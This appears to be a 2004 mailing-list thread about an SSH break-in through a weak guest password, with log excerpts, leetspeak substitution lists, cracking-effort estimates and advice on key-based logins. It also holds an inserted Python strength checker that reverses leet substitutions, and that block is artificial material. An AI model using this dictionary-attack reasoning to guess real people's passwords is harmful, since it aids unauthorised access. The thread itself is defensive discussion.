It was just an example.  I sprinkle liberally with punctuation.  :-)

 Use other characters that will make the word absolutely not dictionary related
 
 x[([EMAIL PROTECTED])~(w0rD)]x

However, if you haven't moved to RSA based longer passwords, that's
effectively x[([EMAIL PROTECTED]) (which isn't bad, but you may be typing more than
is recognized).  Stock passwords are eight chars.  The rest are ignored.


-- 
Any technology distinguishable from magic is insufficiently advanced.
(*)   http://www.spots.ab.ca/~keeling 
- -





Re: See what a weak password will get ya?

2004-07-22 Thread Paul Stolp
* dircha [EMAIL PROTECTED] [2004-07-22 21:48]:
 Scarletdown wrote:
 |  == K
   == X
 | == P
 
 Anyone else care to add to this little list?
 
 0 == O
 $ == S
 |-| == H
 |_| == U
 |_ == L
 \/\/ == W
 /\/\ == M
 |V| == M
 |\| == N
 |-o-| == tie fighter
 {-o-} == tie interceptor

Good plan, I need to improve my ascii art collection.
-- 





Re: OT: Re: See what a weak password will get ya?

2004-07-22 Thread Paul Stolp
* s. keeling [EMAIL PROTECTED] [2004-07-22 22:03]:
 Incoming from Paul Stolp:
  I checked in on some bittorrent progress today at lunch, noticed my
  process monitor showing full activity. Ran top, saw user guest logged
  on, running 4 instances of a program named t, and short term load
  average over 4. AAGGGHHH!
  shutdown -h now  !
  pull network cable
  reboot
  look for damage, whew, I was O.K. -- I'm sure it helps to be up to date
 ...
 
 How did you manage to verify that?  Are you running chkrootkit?
 tripwire?  Something else?

chkrootkit, plus verification of md5sums of certain binaries.

 
 (0) keeling /home/keeling_ host smenlove.home.ro
 smenlove.home.roA   81.196.20.133
 
 (0) keeling /home/keeling_ ripe 81.196.20.133
 inetnum:  81.196.20.128 - 81.196.20.159
 netname:  RO-RDS-HOME-RO
 descr:Home.RO / Go.RO
 country:  RO
 admin-c:  HAD6-RIPE
 tech-c:   HAD6-RIPE
 status:   ASSIGNED PA
 remarks:  INFRA-AW
 remarks:  +---+
 remarks:  | ABUSE CONTACT: [EMAIL PROTECTED] IN CASE OF HACK ATTACKS, |
 remarks:  | ILLEGAL ACTIVITY, VIOLATION, SCANS, PROBES, SPAM, ETC.|
 remarks:  +---+
 ...
 

Reported.

 
  Jul 22 10:24:39 greta sshd[22405]: Accepted password for guest from
  156.17.99.11
   port 37228 ssh2
   Jul 22 10:24:39 greta sshd[22407]: (pam_unix) session opened for user
   guest by (
   uid=0)
 ...^
 
Maybe I'm missing something, but isn't that how sshd works? That's what
I get logging in from my usual account...

  Jul 22 12:09:33 greta sshd[22595]: Accepted password for guest from
  80.110.102.105 port 3938 ssh2
  Jul 22 12:09:33 greta sshd[22597]: (pam_unix) session opened for user
  guest by (uid=0)
  Jul 22 12:12:45 greta passwd[22663]: (pam_unix) authentication failure;
   ^^^
  logname=guest uid=1002 euid=0 tty= ruser=
 .^^
 
 
  Just wanted to share the need for strong passwords.
 
 Not to mention backups and fresh installation media?
 

You better believe it!
-- 





Re: See what a weak password will get ya?

2004-07-22 Thread Paul Stolp
* Chris Metzler [EMAIL PROTECTED] [2004-07-22 22:18]:
 On Thu, 22 Jul 2004 17:42:53 -0500
 Paul Stolp [EMAIL PROTECTED] wrote:
 
  shutdown -h now  !
 
 Believe it or not, this is often a bad idea.  It's often easier to
 determine the scope of a compromise by watching the intruder for a little
 while than to attempt to find out afterwards with forensics.

I thought this afterwards, but it appears the attacker went away empty
handed anyways. He was already logged out when I noticed the high load.
He tried to kill the t program, but couldn't. I suspect he was
somewhat inept (as was I with the pathetic password I assigned to the
guest account!). In reviewing the logs and bash history, it becomes
fairly easy to piece together.

I will definitely consider your advice when I'm in this situation again.

 
  look for damage, whew, I was O.K.
 
 How did you determine this?

chkrootkit and, more satisfying to me, md5sums of some key binaries.

Thanks,
Paul
-- 





Re: See what a weak password will get ya?

2004-07-22 Thread charlie derr
Paul Stolp wrote:
* dircha [EMAIL PROTECTED] [2004-07-22 21:48]:
Scarletdown wrote:
|  == K
 == X
| == P
Anyone else care to add to this little list?
0 == O
$ == S
|-| == H
|_| == U
|_ == L
\/\/ == W
/\/\ == M
|V| == M
|\| == N
|-o-| == tie fighter
{-o-} == tie interceptor

Good plan, I need to improve my ascii art collection.
^ = V or n //well, sort of :-0
! = i
4 = A
 = G
3 = E
5 = S
+ = T
i suppose now i ought to look at the rest of the thread too (i didn't 
notice where it started)

~c





Re: OT: Re: See what a weak password will get ya?

2004-07-22 Thread s. keeling
Incoming from Paul Stolp:
 * s. keeling [EMAIL PROTECTED] [2004-07-22 22:03]:
  Incoming from Paul Stolp:
   look for damage, whew, I was O.K. -- I'm sure it helps to be up to date
  ...
  
  How did you manage to verify that?  Are you running chkrootkit?
  tripwire?  Something else?
 
 chkrootkit, plus verification of md5sums of certain binaries.

Good luck.  You're drivin'.  Me?  I'd at least take it off-line and
burn a CD.  Then you can have something to compare it to if anything
starts to look wonky in the future.


-- 
Any technology distinguishable from magic is insufficiently advanced.
(*)   http://www.spots.ab.ca/~keeling 
- -





Re: See what a weak password will get ya?

2004-07-22 Thread Greg Folkert
On Thu, 2004-07-22 at 22:59, s. keeling wrote:
 Incoming from Scarletdown:
  
  An example of a good password (though since I'm posting it here, it can 
  no longer be considered good) is:
  
  [EMAIL PROTECTED]
 
 I disagree.  A cracking program is going to attempt to match
 permutations of dictionary words.  This will not add much more time to
 reach the solution.  Better is concatenation of two strings that won't
 match a dictionary pattern:
 
 b1rDW0rm
 
  |  == K
   == X
  | == P
  
  Anyone else care to add to this little list?
 
 Hadn't thought of those.  Cute.
 
 Apparently, the best is to replace crypt based passwords with RSA
 based, and use longer passwords.

Actually, best actual reasonable password is: to not use one

Use key-based authentication. Personally, I use 2048bit keys for machines
that are considered core/valuable.

Play machines... only get 1024bit. I have a master private key, with
everything being generated as subkeys from that. Yeap, the passphrase
for it is actually purty darn long. It is one of those things you hate
to type in. I really think about how long it is, it just flows from the
hands. Now come to think of it... at least 25 characters long.

Key authentication is by far much more secure than a regular password.

Best part is, you can make it so you only have to type your pass phrase
ONCE!
-- 
greg, [EMAIL PROTECTED]

The technology that is
Stronger, better, faster:  Linux




Re: See what a weak password will get ya?

2004-07-22 Thread Monique Y. Mudama
On 2004-07-22, Paul Stolp penned:

 Anyways, I've re-downloaded the files the attacker used and removed
 (for posterity.) I changed all passwords, IP Address, I found the
 evidence at about 12:24.  Just wanted to share the need for strong
 passwords.

I'd add the suggestion to not use obvious usernames like guest ... 

Btw, are you 100% sure they never managed to root you and replace some
of your files?

-- 
monique





Re: See what a weak password will get ya?

2004-07-22 Thread Tim Connors
Mathieu Ducharme [EMAIL PROTECTED] said on Thu, 22 Jul 2004 23:33:48 -0400:
 I'm pretty sure dictionary attack also look for this. (?)
 
 Use other characters that will make the word absolutely not dictionary-related
 
 x[([EMAIL PROTECTED])~(w0rD)]x
 
 Still as easy to remember (longer to type though)

I don't remember my password, my fingers do.

Which means, that when you come off a plane with your BIOS passwd
protected laptop that you had been using fine for quite some time on
the plane and at the airport, and you develop a massive headache,
then the headache goes away, and you plug in, and try to remember your
password, because your fingers are getting it wrong, well, no good
happens.

So you try to log in to your home institution, thinking that maybe the
BIOS absorbed a few too many cosmic rays, and start panicking, because
none of the passwords you have used in the past 5 years
works. Eventually, let the pain in your head subside, and find out
that that headache simply caused your brain to forget that you changed
passwords about a month back, and somehow your fingers aren't
remembering for the time being :)

-- 
TimC -- http://astronomy.swin.edu.au/staff/tconnors/
Does bacteria culture in coffee cup qualify as pet? Have already
givink it name. -- Pitr Dubovich/User Friendly





cracking - Re: See what a weak password will get ya?

2004-07-22 Thread Alvin Oga


On Thu, 22 Jul 2004, s. keeling wrote:

   I disagree.  A cracking program is going to attempt to match
   permutations of dictionary words.  This will not add much more time to

...

how fast can a cracking system go through dictionary words that are misspelled 
with various digits and special char
- changing o to 0 ( and equivalents ) won't slow down the crackers

- brute force cracking will take 60**8 permutations (1.7x10**14) :-)
( a-z A-Z 0-9 30special chars )
- a small number of permutations by math standards

- but NOT all character positions will be special random
characters which then simplifies the possible permutations

if you can think of these modified passwd, a good cracking program should
already be checking for it too :-)

-- a trick question ... how does the cracker know that they hit the right
   passwd ??
- they can't be logging into your box for each try
- your box should be denying remote access after 3-5 
failed login attempts

- and hopefully, they don't have the passwd file from /etc/shadow
to compare against 

 However, if you haven't moved to RSA based longer passwords, that's
 effectively x[([EMAIL PROTECTED]) (which isn't bad, but you may be typing more than
 is recognized).  Stock passwords are eight chars.  The rest are ignored.

it seems like some systems use more than 8char pwd and others ignore the
balance ..

c ya
alvin


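Alvin's point above, and keeling's b1rDW0rm suggestion earlier in the thread, both come down to the same question: does swapping letters for look-alike symbols move a password out of the dictionary, and how does the resulting search space compare with brute force? The block below is an added example, not code from the thread or from any password-checking tool it mentions. It does what a defensive strength checker does: it reads each look-alike symbol back as every letter it could stand for (the symbol table is built from the substitutions listed in the thread, plus 7 for T), strips decorative punctuation, and asks whether what is left is one or two dictionary words. It also counts how many spellings a word can reach through case changes and those substitutions, next to the 60**8 brute-force figure from the post. The five-word dictionary, the function names and the sample passwords other than b1rDW0rm are constructed for the example.

```python
"""Does 'leet' substitution take a password out of the dictionary?
Added example; not from the thread. UNLEET and WORDS are constructed."""
import itertools

# Reverse map: a look-alike symbol -> the letters it may stand for.
# Built from the substitutions the thread lists (o/0, i/1/!, l/1/|, e/3,
# a/4/@, s/5/$, t/+), with 7 added for t.
UNLEET = {
    "0": "o", "1": "il", "3": "e", "4": "a", "5": "s", "$": "s",
    "+": "t", "7": "t", "!": "i", "@": "a", "|": "l",
}

# Tiny constructed dictionary; a real checker loads a system word list.
WORDS = {"bird", "worm", "password", "guest", "secret"}

# Punctuation and digits that commonly decorate the ends of a word.
NOISE = "0123456789!@#$%^&*()[]{}<>~-_=+|\\/."


def normalized_forms(pw, limit=4096):
    """Yield every lower-case reading of pw: each symbol is tried both as the
    letters it could stand for and as itself (so '!' can be 'i' or padding).
    Bounded by limit so a long password cannot blow up the search."""
    choices = [UNLEET.get(c, "") + c.lower() for c in pw]
    for n, combo in enumerate(itertools.product(*choices)):
        if n >= limit:
            return
        yield "".join(combo)


def dictionary_core(pw):
    """Return the dictionary word (or pair of words) pw reduces to, else None."""
    for form in normalized_forms(pw):
        core = form.strip(NOISE)
        if core in WORDS:
            return (core,)
        # Two concatenated words, as in b1rDW0rm.
        for i in range(1, len(core)):
            if core[:i] in WORDS and core[i:] in WORDS:
                return (core[:i], core[i:])
    return None


def keyspace(alphabet_size, length):
    """Brute-force search space for a random password of the given length."""
    return alphabet_size ** length


def leet_variant_count(word):
    """Number of spellings reachable from word by case changes plus the
    UNLEET substitutions: each letter has 2 cases plus its symbol forms.
    This is the extra work a dictionary attack needs, per word."""
    forward = {}
    for sym, letters in UNLEET.items():
        for letter in letters:
            forward.setdefault(letter, set()).add(sym)
    n = 1
    for ch in word.lower():
        n *= 2 + len(forward.get(ch, ()))
    return n


if __name__ == "__main__":
    for pw in ["b1rDW0rm", "P4$$w0rd", "gu3st!", "Tq7#vLm2"]:  # last three constructed
        print(pw, "->", dictionary_core(pw))
    print("brute force, 60 symbols x 8 positions:", keyspace(60, 8))
    print("spellings of 'bird':", leet_variant_count("bird"))
    print("spellings of 'birdworm':", leet_variant_count("birdworm"))
```

The numbers make the thread's argument concrete: even the two-word b1rDW0rm has only a few hundred symbol-and-case spellings, a rounding error next to the 10**14 brute-force space Alvin quotes, so a cracker that knows the word list loses almost nothing by also trying the substitutions. A checker that rejects anything `dictionary_core` recognizes is the defensive counterpart.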



Re: cracking - Re: See what a weak password will get ya?

2004-07-22 Thread s. keeling
Incoming from Alvin Oga:
 
   - and hopefully, they don't have the passwd file from /etc/shadow
   to compare against 

Agreed.  Once they're in, all bets are off.  Why bother to crack if
you can sniff?


-- 
Any technology distinguishable from magic is insufficiently advanced.
(*)   http://www.spots.ab.ca/~keeling 
- -

